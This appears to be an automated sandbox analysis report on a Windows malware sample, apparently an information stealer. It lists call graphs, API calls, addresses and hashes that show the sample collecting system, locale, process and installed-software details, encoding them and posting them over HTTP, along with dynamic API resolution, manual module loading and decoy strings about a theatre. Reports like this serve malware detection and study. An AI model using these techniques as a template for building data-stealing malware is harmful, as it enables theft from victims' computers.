14970->14971 14972 e31c80 14971->14972 14973 e3a8a0 lstrcpy 14972->14973 14974 e31c89 14973->14974 15675 e377c0 GetCurrentProcess IsWow64Process 14974->15675 14977 e3a9b0 4 API calls 14978 e31ca9 14977->14978 14979 e3a8a0 lstrcpy 14978->14979 14980 e31cb2 14979->14980 14981 e3a9b0 4 API calls 14980->14981 14982 e31cd1 14981->14982 14983 e3a8a0 lstrcpy 14982->14983 14984 e31cda 14983->14984 14985 e3a9b0 4 API calls 14984->14985 14986 e31cfb 14985->14986 14987 e3a8a0 lstrcpy 14986->14987 14988 e31d04 14987->14988 14989 e37850 3 API calls 14988->14989 14990 e31d14 14989->14990 14991 e3a9b0 4 API calls 14990->14991 14992 e31d24 14991->14992 14993 e3a8a0 lstrcpy 14992->14993 14994 e31d2d 14993->14994 14995 e3a9b0 4 API calls 14994->14995 14996 e31d4c 14995->14996 14997 e3a8a0 lstrcpy 14996->14997 14998 e31d55 14997->14998 14999 e3a9b0 4 API calls 14998->14999 15000 e31d75 14999->15000 15001 e3a8a0 lstrcpy 15000->15001 15002 e31d7e 15001->15002 15003 e378e0 3 API calls 15002->15003 15004 e31d8e 15003->15004 15005 e3a9b0 4 API calls 15004->15005 15006 e31d9e 15005->15006 15007 e3a8a0 lstrcpy 15006->15007 15008 e31da7 15007->15008 15009 e3a9b0 4 API calls 15008->15009 15010 e31dc6 15009->15010 15011 e3a8a0 lstrcpy 15010->15011 15012 e31dcf 15011->15012 15013 e3a9b0 4 API calls 15012->15013 15014 e31df0 15013->15014 15015 e3a8a0 lstrcpy 15014->15015 15016 e31df9 15015->15016 15677 e37980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15016->15677 15019 e3a9b0 4 API calls 15020 e31e19 15019->15020 15021 e3a8a0 lstrcpy 15020->15021 15022 e31e22 15021->15022 15023 e3a9b0 4 API calls 15022->15023 15024 e31e41 15023->15024 15025 e3a8a0 lstrcpy 15024->15025 15026 e31e4a 15025->15026 15027 e3a9b0 4 API calls 15026->15027 15028 e31e6b 15027->15028 15029 e3a8a0 lstrcpy 15028->15029 15030 e31e74 15029->15030 15679 e37a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15030->15679 15033 e3a9b0 4 API calls 15034 e31e94 15033->15034 15035 e3a8a0 lstrcpy 15034->15035 15036 e31e9d 15035->15036 15037 e3a9b0 4 API calls 15036->15037 15038 e31ebc 15037->15038 15039 e3a8a0 lstrcpy 15038->15039 15040 e31ec5 15039->15040 15041 e3a9b0 4 API calls 15040->15041 15042 e31ee5 15041->15042 15043 e3a8a0 lstrcpy 15042->15043 15044 e31eee 15043->15044 15682 e37b00 GetUserDefaultLocaleName 15044->15682 15047 e3a9b0 4 API calls 15048 e31f0e 15047->15048 15049 e3a8a0 lstrcpy 15048->15049 15050 e31f17 15049->15050 15051 e3a9b0 4 API calls 15050->15051 15052 e31f36 15051->15052 15053 e3a8a0 lstrcpy 15052->15053 15054 e31f3f 15053->15054 15055 e3a9b0 4 API calls 15054->15055 15056 e31f60 15055->15056 15057 e3a8a0 lstrcpy 15056->15057 15058 e31f69 15057->15058 15686 e37b90 15058->15686 15060 e31f80 15061 e3a920 3 API calls 15060->15061 15062 e31f93 15061->15062 15063 e3a8a0 lstrcpy 15062->15063 15064 e31f9c 15063->15064 15065 e3a9b0 4 API calls 15064->15065 15066 e31fc6 15065->15066 15067 e3a8a0 lstrcpy 15066->15067 15068 e31fcf 15067->15068 15069 e3a9b0 4 API calls 15068->15069 15070 e31fef 15069->15070 15071 e3a8a0 lstrcpy 15070->15071 15072 e31ff8 15071->15072 15698 e37d80 GetSystemPowerStatus 15072->15698 15075 e3a9b0 4 API calls 15076 e32018 15075->15076 15077 e3a8a0 lstrcpy 15076->15077 15078 e32021 15077->15078 15079 e3a9b0 4 API calls 15078->15079 15080 e32040 15079->15080 15081 e3a8a0 lstrcpy 15080->15081 15082 e32049 15081->15082 15083 e3a9b0 4 API calls 15082->15083 15084 e3206a 15083->15084 15085 e3a8a0 lstrcpy 15084->15085 15086 e32073 15085->15086 15087 e3207e GetCurrentProcessId 15086->15087 15700 e39470 OpenProcess 15087->15700 15090 e3a920 3 API calls 15091 e320a4 15090->15091 15092 e3a8a0 lstrcpy 15091->15092 15093 e320ad 15092->15093 15094 e3a9b0 4 API calls 15093->15094 15095 e320d7 15094->15095 15096 e3a8a0 lstrcpy 15095->15096 15097 e320e0 15096->15097 15098 e3a9b0 4 API calls 15097->15098 15099 e32100 15098->15099 15100 e3a8a0 lstrcpy 15099->15100 15101 e32109 15100->15101 15705 e37e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15101->15705 15104 e3a9b0 4 API calls 15105 e32129 15104->15105 15106 e3a8a0 lstrcpy 15105->15106 15107 e32132 15106->15107 15108 e3a9b0 4 API calls 15107->15108 15109 e32151 15108->15109 15110 e3a8a0 lstrcpy 15109->15110 15111 e3215a 15110->15111 15112 e3a9b0 4 API calls 15111->15112 15113 e3217b 15112->15113 15114 e3a8a0 lstrcpy 15113->15114 15115 e32184 15114->15115 15709 e37f60 15115->15709 15118 e3a9b0 4 API calls 15119 e321a4 15118->15119 15120 e3a8a0 lstrcpy 15119->15120 15121 e321ad 15120->15121 15122 e3a9b0 4 API calls 15121->15122 15123 e321cc 15122->15123 15124 e3a8a0 lstrcpy 15123->15124 15125 e321d5 15124->15125 15126 e3a9b0 4 API calls 15125->15126 15127 e321f6 15126->15127 15128 e3a8a0 lstrcpy 15127->15128 15129 e321ff 15128->15129 15722 e37ed0 GetSystemInfo wsprintfA 15129->15722 15132 e3a9b0 4 API calls 15133 e3221f 15132->15133 15134 e3a8a0 lstrcpy 15133->15134 15135 e32228 15134->15135 15136 e3a9b0 4 API calls 15135->15136 15137 e32247 15136->15137 15138 e3a8a0 lstrcpy 15137->15138 15139 e32250 15138->15139 15140 e3a9b0 4 API calls 15139->15140 15141 e32270 15140->15141 15142 e3a8a0 lstrcpy 15141->15142 15143 e32279 15142->15143 15724 e38100 GetProcessHeap RtlAllocateHeap 15143->15724 15146 e3a9b0 4 API calls 15147 e32299 15146->15147 15148 e3a8a0 lstrcpy 15147->15148 15149 e322a2 15148->15149 15150 e3a9b0 4 API calls 15149->15150 15151 e322c1 15150->15151 15152 e3a8a0 lstrcpy 15151->15152 15153 e322ca 15152->15153 15154 e3a9b0 4 API calls 15153->15154 15155 e322eb 15154->15155 15156 e3a8a0 lstrcpy 15155->15156 15157 e322f4 15156->15157 15730 e387c0 15157->15730 15160 e3a920 3 API calls 15161 e3231e 15160->15161 15162 e3a8a0 lstrcpy 15161->15162 15163 e32327 15162->15163 15164 e3a9b0 4 API calls 15163->15164 15165 e32351 15164->15165 15166 e3a8a0 lstrcpy 15165->15166 15167 e3235a 15166->15167 15168 e3a9b0 4 API calls 15167->15168 15169 e3237a 15168->15169 15170 e3a8a0 lstrcpy 15169->15170 15171 e32383 15170->15171 15172 e3a9b0 4 API calls 15171->15172 15173 e323a2 15172->15173 15174 e3a8a0 lstrcpy 15173->15174 15175 e323ab 15174->15175 15735 e381f0 15175->15735 15177 e323c2 15178 e3a920 3 API calls 15177->15178 15179 e323d5 15178->15179 15180 e3a8a0 lstrcpy 15179->15180 15181 e323de 15180->15181 15182 e3a9b0 4 API calls 15181->15182 15183 e3240a 15182->15183 15184 e3a8a0 lstrcpy 15183->15184 15185 e32413 15184->15185 15186 e3a9b0 4 API calls 15185->15186 15187 e32432 15186->15187 15188 e3a8a0 lstrcpy 15187->15188 15189 e3243b 15188->15189 15190 e3a9b0 4 API calls 15189->15190 15191 e3245c 15190->15191 15192 e3a8a0 lstrcpy 15191->15192 15193 e32465 15192->15193 15194 e3a9b0 4 API calls 15193->15194 15195 e32484 15194->15195 15196 e3a8a0 lstrcpy 15195->15196 15197 e3248d 15196->15197 15198 e3a9b0 4 API calls 15197->15198 15199 e324ae 15198->15199 15200 e3a8a0 lstrcpy 15199->15200 15201 e324b7 15200->15201 15743 e38320 15201->15743 15203 e324d3 15204 e3a920 3 API calls 15203->15204 15205 e324e6 15204->15205 15206 e3a8a0 lstrcpy 15205->15206 15207 e324ef 15206->15207 15208 e3a9b0 4 API calls 15207->15208 15209 e32519 15208->15209 15210 e3a8a0 lstrcpy 15209->15210 15211 e32522 15210->15211 15212 e3a9b0 4 API calls 15211->15212 15213 e32543 15212->15213 15214 e3a8a0 lstrcpy 15213->15214 15215 e3254c 15214->15215 15216 e38320 17 API calls 15215->15216 15217 e32568 15216->15217 15218 e3a920 3 API calls 15217->15218 15219 e3257b 15218->15219 15220 e3a8a0 lstrcpy 15219->15220 15221 e32584 15220->15221 15222 e3a9b0 4 API calls 15221->15222 15223 e325ae 15222->15223 15224 e3a8a0 lstrcpy 15223->15224 15225 e325b7 15224->15225 15226 e3a9b0 4 API calls 15225->15226 15227 e325d6 15226->15227 15228 e3a8a0 lstrcpy 15227->15228 15229 e325df 15228->15229 15230 e3a9b0 4 API calls 15229->15230 15231 e32600 15230->15231 15232 e3a8a0 lstrcpy 15231->15232 15233 e32609 15232->15233 15779 e38680 15233->15779 15235 e32620 15236 e3a920 3 API calls 15235->15236 15237 e32633 15236->15237 15238 e3a8a0 lstrcpy 15237->15238 15239 e3263c 15238->15239 15240 e3265a lstrlen 15239->15240 15241 e3266a 15240->15241 15242 e3a740 lstrcpy 15241->15242 15243 e3267c 15242->15243 15244 e21590 lstrcpy 15243->15244 15245 e3268d 15244->15245 15789 e35190 15245->15789 15247 e32699 15247->13679 15977 e3aad0 15248->15977 15250 e25009 InternetOpenUrlA 15254 e25021 15250->15254 15251 e250a0 InternetCloseHandle InternetCloseHandle 15253 e250ec 15251->15253 15252 e2502a InternetReadFile 15252->15254 15253->13683 15254->15251 15254->15252 15978 e298d0 15255->15978 15257 e30759 15258 e30a38 15257->15258 15259 e3077d 15257->15259 15260 e21590 lstrcpy 15258->15260 15262 e30799 StrCmpCA 15259->15262 15261 e30a49 15260->15261 16154 e30250 15261->16154 15264 e30843 15262->15264 15265 e307a8 15262->15265 15268 e30865 StrCmpCA 15264->15268 15267 e3a7a0 lstrcpy 15265->15267 15269 e307c3 15267->15269 15270 e30874 15268->15270 15307 e3096b 15268->15307 15271 e21590 lstrcpy 15269->15271 15272 e3a740 lstrcpy 15270->15272 15273 e3080c 15271->15273 15276 e30881 15272->15276 15274 e3a7a0 lstrcpy 15273->15274 15277 e30823 15274->15277 15275 e3099c StrCmpCA 15278 e30a2d 15275->15278 15279 e309ab 15275->15279 15280 e3a9b0 4 API calls 15276->15280 15281 e3a7a0 lstrcpy 15277->15281 15278->13687 15282 e21590 lstrcpy 15279->15282 15283 e308ac 15280->15283 15284 e3083e 15281->15284 15285 e309f4 15282->15285 15286 e3a920 3 API calls 15283->15286 15981 e2fb00 15284->15981 15288 e3a7a0 lstrcpy 15285->15288 15289 e308b3 15286->15289 15291 e30a0d 15288->15291 15290 e3a9b0 4 API calls 15289->15290 15292 e308ba 15290->15292 15293 e3a7a0 lstrcpy 15291->15293 15295 e3a8a0 lstrcpy 15292->15295 15294 e30a28 15293->15294 15307->15275 15629 e3a7a0 lstrcpy 15628->15629 15630 e21683 15629->15630 15631 e3a7a0 lstrcpy 15630->15631 15632 e21695 15631->15632 15633 e3a7a0 lstrcpy 15632->15633 15634 e216a7 15633->15634 15635 e3a7a0 lstrcpy 15634->15635 15636 e215a3 15635->15636 15636->14510 15638 e247c6 15637->15638 15639 e24838 lstrlen 15638->15639 15663 e3aad0 15639->15663 15641 e24848 InternetCrackUrlA 15642 e24867 15641->15642 15642->14587 15644 e3a740 lstrcpy 15643->15644 15645 e38b74 15644->15645 15646 e3a740 lstrcpy 15645->15646 15647 e38b82 GetSystemTime 15646->15647 15649 e38b99 15647->15649 15648 e3a7a0 lstrcpy 15650 e38bfc 15648->15650 15649->15648 15650->14602 15653 e3a931 15651->15653 15652 e3a988 15654 e3a7a0 lstrcpy 15652->15654 15653->15652 15655 e3a968 lstrcpy lstrcat 15653->15655 15656 e3a994 15654->15656 15655->15652 15656->14606 15657->14720 15659 e24eee 15658->15659 15660 e29af9 LocalAlloc 15658->15660 15659->14608 15659->14611 15660->15659 15661 e29b14 CryptStringToBinaryA 15660->15661 15661->15659 15662 e29b39 LocalFree 15661->15662 15662->15659 15663->15641 15664->14730 15665->14871 15666->14873 15667->14881 15796 e377a0 15668->15796 15671 e376c6 RegOpenKeyExA 15673 e376e7 RegQueryValueExA 15671->15673 15674 e37704 RegCloseKey 15671->15674 15672 e31c1e 15672->14963 15673->15674 15674->15672 15676 e31c99 15675->15676 15676->14977 15678 e31e09 15677->15678 15678->15019 15680 e31e84 15679->15680 15681 e37a9a wsprintfA 15679->15681 15680->15033 15681->15680 15683 e37b4d 15682->15683 15685 e31efe 15682->15685 15803 e38d20 LocalAlloc CharToOemW 15683->15803 15685->15047 15687 e3a740 lstrcpy 15686->15687 15688 e37bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15687->15688 15689 e37c25 15688->15689 15690 e37c46 GetLocaleInfoA 15689->15690 15691 e37d18 15689->15691 15695 e3a8a0 lstrcpy 15689->15695 15696 e3a9b0 lstrcpy lstrlen lstrcpy lstrcat 15689->15696 15690->15689 15692 e37d28 15691->15692 15693 e37d1e LocalFree 15691->15693 15694 e3a7a0 lstrcpy 15692->15694 15693->15692 15697 e37d37 15694->15697 15695->15689 15696->15689 15697->15060 15699 e32008 15698->15699 15699->15075 15701 e39493 GetModuleFileNameExA CloseHandle 15700->15701 15702 e394b5 15700->15702 15701->15702 15703 e3a740 lstrcpy 15702->15703 15704 e32091 15703->15704 15704->15090 15706 e32119 15705->15706 15707 e37e68 RegQueryValueExA 15705->15707 15706->15104 15708 e37e8e RegCloseKey 15707->15708 15708->15706 15710 e37fb9 GetLogicalProcessorInformationEx 15709->15710 15711 e38029 15710->15711 15712 e37fd8 GetLastError 15710->15712 15717 e389f0 2 API calls 15711->15717 15718 e37fe3 15712->15718 15720 e38022 15712->15720 15715 e389f0 2 API calls 15716 e32194 15715->15716 15716->15118 15719 e3807b 15717->15719 15718->15710 15718->15716 15804 e389f0 15718->15804 15807 e38a10 GetProcessHeap RtlAllocateHeap 15718->15807 15719->15720 15721 e38084 wsprintfA 15719->15721 15720->15715 15720->15716 15721->15716 15723 e3220f 15722->15723 15723->15132 15725 e389b0 15724->15725 15726 e3814d GlobalMemoryStatusEx 15725->15726 15729 e38163 __aulldiv 15726->15729 15727 e3819b wsprintfA 15728 e32289 15727->15728 15728->15146 15729->15727 15731 e387fb GetProcessHeap RtlAllocateHeap wsprintfA 15730->15731 15733 e3a740 lstrcpy 15731->15733 15734 e3230b 15733->15734 15734->15160 15736 e3a740 lstrcpy 15735->15736 15742 e38229 15736->15742 15737 e38263 15738 e3a7a0 lstrcpy 15737->15738 15740 e382dc 15738->15740 15739 e3a9b0 lstrcpy lstrlen lstrcpy lstrcat 15739->15742 15740->15177 15741 e3a8a0 lstrcpy 15741->15742 15742->15737 15742->15739 15742->15741 15744 e3a740 lstrcpy 15743->15744 15745 e3835c RegOpenKeyExA 15744->15745 15746 e383d0 15745->15746 15747 e383ae 15745->15747 15749 e38613 RegCloseKey 15746->15749 15750 e383f8 RegEnumKeyExA 15746->15750 15748 e3a7a0 lstrcpy 15747->15748 15756 e383bd 15748->15756 15753 e3a7a0 lstrcpy 15749->15753 15751 e3843f wsprintfA RegOpenKeyExA 15750->15751 15752 e3860e 15750->15752 15754 e384c1 RegQueryValueExA 15751->15754 15755 e38485 RegCloseKey RegCloseKey 15751->15755 15752->15749 15753->15756 15758 e38601 RegCloseKey 15754->15758 15759 e384fa lstrlen 15754->15759 15757 e3a7a0 lstrcpy 15755->15757 15756->15203 15757->15756 15758->15752 15759->15758 15760 e38510 15759->15760 15761 e3a9b0 4 API calls 15760->15761 15762 e38527 15761->15762 15763 e3a8a0 lstrcpy 15762->15763 15764 e38533 15763->15764 15765 e3a9b0 4 API calls 15764->15765 15766 e38557 15765->15766 15767 e3a8a0 lstrcpy 15766->15767 15768 e38563 15767->15768 15769 e3856e RegQueryValueExA 15768->15769 15769->15758 15770 e385a3 15769->15770 15771 e3a9b0 4 API calls 15770->15771 15772 e385ba 15771->15772 15773 e3a8a0 lstrcpy 15772->15773 15774 e385c6 15773->15774 15775 e3a9b0 4 API calls 15774->15775 15776 e385ea 15775->15776 15777 e3a8a0 lstrcpy 15776->15777 15778 e385f6 15777->15778 15778->15758 15780 e3a740 lstrcpy 15779->15780 15781 e386bc CreateToolhelp32Snapshot Process32First 15780->15781 15782 e386e8 Process32Next 15781->15782 15783 e3875d CloseHandle 15781->15783 15782->15783 15786 e386fd 15782->15786 15784 e3a7a0 lstrcpy 15783->15784 15785 e38776 15784->15785 15785->15235 15786->15782 15787 e3a9b0 lstrcpy lstrlen lstrcpy lstrcat 15786->15787 15788 e3a8a0 lstrcpy 15786->15788 15787->15786 15788->15786 15790 e3a7a0 lstrcpy 15789->15790 15791 e351b5 15790->15791 15792 e21590 lstrcpy 15791->15792 15793 e351c6 15792->15793 15808 e25100 15793->15808 15795 e351cf 15795->15247 15799 e37720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15796->15799 15798 e376b9 15798->15671 15798->15672 15800 e37780 RegCloseKey 15799->15800 15801 e37765 RegQueryValueExA 15799->15801 15802 e37793 15800->15802 15801->15800 15802->15798 15803->15685 15805 e389f9 GetProcessHeap HeapFree 15804->15805 15806 e38a0c 15804->15806 15805->15806 15806->15718 15807->15718 15809 e3a7a0 lstrcpy 15808->15809 15810 e25119 15809->15810 15811 e247b0 2 API calls 15810->15811 15812 e25125 15811->15812 15968 e38ea0 15812->15968 15814 e25184 15815 e25192 lstrlen 15814->15815 15816 e251a5 15815->15816 15817 e38ea0 4 API calls 15816->15817 15818 e251b6 15817->15818 15819 e3a740 lstrcpy 15818->15819 15820 e251c9 15819->15820 15821 e3a740 lstrcpy 15820->15821 15822 e251d6 15821->15822 15823 e3a740 lstrcpy 15822->15823 15824 e251e3 15823->15824 15825 e3a740 lstrcpy 15824->15825 15826 e251f0 15825->15826 15827 e3a740 lstrcpy 15826->15827 15828 e251fd InternetOpenA StrCmpCA 15827->15828 15829 e2522f 15828->15829 15830 e258c4 InternetCloseHandle 15829->15830 15831 e38b60 3 API calls 15829->15831 15837 e258d9 ctype 15830->15837 15832 e2524e 15831->15832 15833 e3a920 3 API calls 15832->15833 15834 e25261 15833->15834 15835 e3a8a0 lstrcpy 15834->15835 15836 e2526a 15835->15836 15838 e3a9b0 4 API calls 15836->15838 15841 e3a7a0 lstrcpy 15837->15841 15839 e252ab 15838->15839 15840 e3a920 3 API calls 15839->15840 15842 e252b2 15840->15842 15848 e25913 15841->15848 15843 e3a9b0 4 API calls 15842->15843 15844 e252b9 15843->15844 15845 e3a8a0 lstrcpy 15844->15845 15846 e252c2 15845->15846 15847 e3a9b0 4 API calls 15846->15847 15849 e25303 15847->15849 15848->15795 15850 e3a920 3 API calls 15849->15850 15851 e2530a 15850->15851 15852 e3a8a0 lstrcpy 15851->15852 15853 e25313 15852->15853 15854 e25329 InternetConnectA 15853->15854 15854->15830 15855 e25359 HttpOpenRequestA 15854->15855 15857 e258b7 InternetCloseHandle 15855->15857 15858 e253b7 15855->15858 15857->15830 15859 e3a9b0 4 API calls 15858->15859 15860 e253cb 15859->15860 15861 e3a8a0 lstrcpy 15860->15861 15862 e253d4 15861->15862 15863 e3a920 3 API calls 15862->15863 15864 e253f2 15863->15864 15865 e3a8a0 lstrcpy 15864->15865 15866 e253fb 15865->15866 15867 e3a9b0 4 API calls 15866->15867 15868 e2541a 15867->15868 15869 e3a8a0 lstrcpy 15868->15869 15870 e25423 15869->15870 15871 e3a9b0 4 API calls 15870->15871 15872 e25444 15871->15872 15873 e3a8a0 lstrcpy 15872->15873 15874 e2544d 15873->15874 15875 e3a9b0 4 API calls 15874->15875 15876 e2546e 15875->15876 15877 e3a8a0 lstrcpy 15876->15877 15969 e38ea9 15968->15969 15970 e38ead CryptBinaryToStringA 15968->15970 15969->15814 15970->15969 15971 e38ece GetProcessHeap RtlAllocateHeap 15970->15971 15971->15969 15972 e38ef4 ctype 15971->15972 15973 e38f05 CryptBinaryToStringA 15972->15973 15973->15969 15977->15250 16220 e29880 15978->16220 15980 e298e1 15980->15257 15982 e3a740 lstrcpy 15981->15982 16155 e3a740 lstrcpy 16154->16155 16156 e30266 16155->16156 16157 e38de0 2 API calls 16156->16157 16158 e3027b 16157->16158 16159 e3a920 3 API calls 16158->16159 16160 e3028b 16159->16160 16161 e3a8a0 lstrcpy 16160->16161 16162 e30294 16161->16162 16163 e3a9b0 4 API calls 16162->16163 16164 e302b8 16163->16164 16221 e2988e 16220->16221 16224 e26fb0 16221->16224 16223 e298ad ctype 16223->15980 16227 e26d40 16224->16227 16228 e26d63 16227->16228 16242 e26d59 16227->16242 16243 e26530 16228->16243 16232 e26dbe 16232->16242 16253 e269b0 16232->16253 16234 e26e2a 16235 e26ee6 VirtualFree 16234->16235 16237 e26ef7 16234->16237 16234->16242 16235->16237 16236 e26f41 16240 e389f0 2 API calls 16236->16240 16236->16242 16237->16236 16238 e26f26 FreeLibrary 16237->16238 16239 e26f38 16237->16239 16238->16237 16241 e389f0 2 API calls 16239->16241 16240->16242 16241->16236 16242->16223 16244 e26542 16243->16244 16246 e26549 16244->16246 16263 e38a10 GetProcessHeap RtlAllocateHeap 16244->16263 16246->16242 16247 e26660 16246->16247 16250 e2668f VirtualAlloc 16247->16250 16249 e26730 16251 e26743 VirtualAlloc 16249->16251 16252 e2673c 16249->16252 16250->16249 16250->16252 16251->16252 16252->16232 16254 e269c9 16253->16254 16255 e269d5 16253->16255 16254->16255 16256 e26a09 LoadLibraryA 16254->16256 16255->16234 16256->16255 16257 e26a32 16256->16257 16260 e26ae0 16257->16260 16264 e38a10 GetProcessHeap RtlAllocateHeap 16257->16264 16259 e26ba8 GetProcAddress 16259->16255 16259->16260 16260->16255 16260->16259 16261 e389f0 2 API calls 16261->16260 16262 e26a8b 16262->16255 16262->16261 16263->16246 16264->16262

                        Executed Functions

                        Function 00E39860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 660 e39860-e39874 call e39750 663 e39a93-e39af2 LoadLibraryA * 5 660->663 664 e3987a-e39a8e call e39780 GetProcAddress * 21 660->664 666 e39af4-e39b08 GetProcAddress 663->666 667 e39b0d-e39b14 663->667 664->663 666->667 668 e39b46-e39b4d 667->668 669 e39b16-e39b41 GetProcAddress * 2 667->669 671 e39b68-e39b6f 668->671 672 e39b4f-e39b63 GetProcAddress 668->672 669->668 673 e39b71-e39b84 GetProcAddress 671->673 674 e39b89-e39b90 671->674 672->671 673->674 675 e39b92-e39bbc GetProcAddress * 2 674->675 676 e39bc1-e39bc2 674->676 675->676
                        APIs
                        • GetProcAddress.KERNEL32(76210000,01961748), ref: 00E398A1
                        • GetProcAddress.KERNEL32(76210000,01961568), ref: 00E398BA
                        • GetProcAddress.KERNEL32(76210000,019615C8), ref: 00E398D2
                        • GetProcAddress.KERNEL32(76210000,019615E0), ref: 00E398EA
                        • GetProcAddress.KERNEL32(76210000,01961538), ref: 00E39903
                        • GetProcAddress.KERNEL32(76210000,019689F0), ref: 00E3991B
                        • GetProcAddress.KERNEL32(76210000,01956718), ref: 00E39933
                        • GetProcAddress.KERNEL32(76210000,01956498), ref: 00E3994C
                        • GetProcAddress.KERNEL32(76210000,019615F8), ref: 00E39964
                        • GetProcAddress.KERNEL32(76210000,019616D0), ref: 00E3997C
                        • GetProcAddress.KERNEL32(76210000,019615B0), ref: 00E39995
                        • GetProcAddress.KERNEL32(76210000,01961760), ref: 00E399AD
                        • GetProcAddress.KERNEL32(76210000,01956678), ref: 00E399C5
                        • GetProcAddress.KERNEL32(76210000,019617A8), ref: 00E399DE
                        • GetProcAddress.KERNEL32(76210000,01961610), ref: 00E399F6
                        • GetProcAddress.KERNEL32(76210000,01956558), ref: 00E39A0E
                        • GetProcAddress.KERNEL32(76210000,01961778), ref: 00E39A27
                        • GetProcAddress.KERNEL32(76210000,019616E8), ref: 00E39A3F
                        • GetProcAddress.KERNEL32(76210000,019566F8), ref: 00E39A57
                        • GetProcAddress.KERNEL32(76210000,01961718), ref: 00E39A70
                        • GetProcAddress.KERNEL32(76210000,01956538), ref: 00E39A88
                        • LoadLibraryA.KERNEL32(01961790,?,00E36A00), ref: 00E39A9A
                        • LoadLibraryA.KERNEL32(01961640,?,00E36A00), ref: 00E39AAB
                        • LoadLibraryA.KERNEL32(019614C0,?,00E36A00), ref: 00E39ABD
                        • LoadLibraryA.KERNEL32(01961508,?,00E36A00), ref: 00E39ACF
                        • LoadLibraryA.KERNEL32(01961550,?,00E36A00), ref: 00E39AE0
                        • GetProcAddress.KERNEL32(75B30000,01961658), ref: 00E39B02
                        • GetProcAddress.KERNEL32(751E0000,01961670), ref: 00E39B23
                        • GetProcAddress.KERNEL32(751E0000,01961688), ref: 00E39B3B
                        • GetProcAddress.KERNEL32(76910000,01968CD0), ref: 00E39B5D
                        • GetProcAddress.KERNEL32(75670000,019565F8), ref: 00E39B7E
                        • GetProcAddress.KERNEL32(77310000,019688E0), ref: 00E39B9F
                        • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 00E39BB6
                        Strings
                        • NtQueryInformationProcess, xrefs: 00E39BAA
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: NtQueryInformationProcess
                        • API String ID: 2238633743-2781105232
                        • Opcode ID: 08aba0c24e2943640e3bde59689abb4111927eeffda9dafe02020c65a2186d42
                        • Instruction ID: 1d62f0f5e5f30f5b57d40a28fe413a54611e14f1bb7f97debcba1166b68a1261
                        • Opcode Fuzzy Hash: 08aba0c24e2943640e3bde59689abb4111927eeffda9dafe02020c65a2186d42
                        • Instruction Fuzzy Hash: 58A11DB5700240DFD364FFA8EA88A563BF9F78C301714455AE686A326CD77FA841DB60
                        Function 00E245C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 764 e245c0-e24695 RtlAllocateHeap 781 e246a0-e246a6 764->781 782 e2474f-e247a9 VirtualProtect 781->782 783 e246ac-e2474a 781->783 783->781
                        APIs
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E2460F
                        • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00E2479C
                        Strings
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E246D8
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E245DD
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E245C7
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E24662
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E246C2
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E24713
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E246B7
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E2477B
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E24678
